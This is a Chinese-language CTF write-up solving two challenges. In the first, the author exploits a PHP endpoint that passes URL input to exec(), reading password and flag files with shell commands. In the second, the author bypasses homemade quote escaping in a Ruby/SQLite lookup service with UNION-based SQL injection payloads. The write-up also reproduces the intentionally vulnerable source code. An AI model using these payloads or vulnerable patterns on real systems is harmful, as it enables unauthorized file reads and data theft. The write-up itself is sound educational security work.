Password checker：代码执行
Little Doggy Tables： SQL注入

Password checker 50

Task

1	https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/

Solution

查看源代码，发现有如下js：

<script type="text/javascript">
function validate(objForm) {
  let toBeCheckedValue = objForm.elements['password'].value;
  let xmlHttp = new XMLHttpRequest();
  xmlHttp.open('GET', '/run.php?cmd=cat%20../password.txt', false);
  xmlHttp.send(null);
  let actualValue = xmlHttp.responseText;
  if (toBeCheckedValue != actualValue) {
    alert('Passwords don\'t match!');
  } else {
    alert('Password validated!');
  }
}
</script>

访问：

1	https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com//run.php?cmd=cat%20../password.txt

得到密码：password123 ，输进去后只是弹出一个提示框。

考虑命令执行，尝试查找flag：

1	https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=find / \| grep flag

1	https://nybas-berog-bitev-fuhyn-fehyt.capturethesquare.com/run.php?cmd=cat /secrets/..109810_05_10_06_49_46.546032825/flag

得到flag：

1	flag-tyzyd-gateh-lefif-girav-bobut

另外读到run.php的源码:

<?php
$line = exec($_GET['cmd']);
echo $line;
?>

Little Doggy Tables 100

Task

"Oh, so you found it. Yes, it will tell you if a given agent is a dog or a cat, by looking up the appropriate value in its SQLite database. Good luck with that.
"Sure, the database contains some sensitive information, but our bulletproof firewall and top-notch quote escaping will ensure it never sees the light of day.
"Not secure? Huh? You don’t believe me? I’ll show you how secure. Here’s the source!"
USAGE EXAMPLE:
curl "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"
https://little-doggy-tables.capturethesquare.com

Solution

源码如下:

#!/usr/bin/env ruby
# author: Will McChesney <wmcc@squareup.com>
require "sqlite3"
require "webrick"
PORT = ARGV[0]
class SecureDatastore
  include Singleton
  def initialize
    @db = SQLite3::Database.new("secure.db")
  end
  def secure_species_lookup(insecure_codename)
    # roll our own escaping to prevent SQL injection attacks
    secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'"))
    query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"
    puts query
    results = @db.execute(query)
    return if results.length == 0
    results[0][0]
  end
end
server = WEBrick::HTTPServer.new(Port: PORT)
trap("INT") { server.shutdown }
class AgentLookupServlet < WEBrick::HTTPServlet::AbstractServlet
  def do_GET(request, response)
    response.status = 200
    response["Content-Type"] = "text/plain"
    response.body = SecureDatastore.instance.secure_species_lookup(request.query["codename"]) + "\n"
  end
end
server.mount "/agent_lookup", AgentLookupServlet
server.start

从题目的一大段描述，以及给出的源码来看应该是考察SQLite3注入。
关键在于下面这两句代码：

1 2	secure_codename = insecure_codename.gsub("'", Regexp.escape("\\'")) query = "SELECT species FROM operatives WHERE codename = '#{secure_codename}';"

会将单引号' 通过正则替换成\'进行转义，来阻止我们闭合。但如果我们传入\'，则在通过正则替换后会变成\\'，其中第二个’\’是正则添加的，配合我们传入的\，会被转义，从而使我们的单引号逃逸。

在sqlite中，注释符为--，尝试访问:

1	https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' or 1=1 --

则服务器端执行的数据库查询语句如下，注意\\：

1	SELECT species FROM operatives WHERE codename = '\\' or 1=1 --';

单引号逃逸成功。

接下去考虑如何注出数据。

1	https://little-doggy-tables.capturethesquare.com/agent_lookup?codename=\' union select sql from sqlite_master limit 0,1--

说明operatives表里有三个字段：codename，species，secret 。

1 2	https://little-doggy-tables.capturethesquare.com/agent_lookup ?codename=\' union select secret from operatives limit 0,1--

直接提交不对。。。后面发现应该要改变limit。最后payload：

1 2	https://little-doggy-tables.capturethesquare.com/agent_lookup ?codename=\' union select secret from operatives limit 9,1--

flag:

1	flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436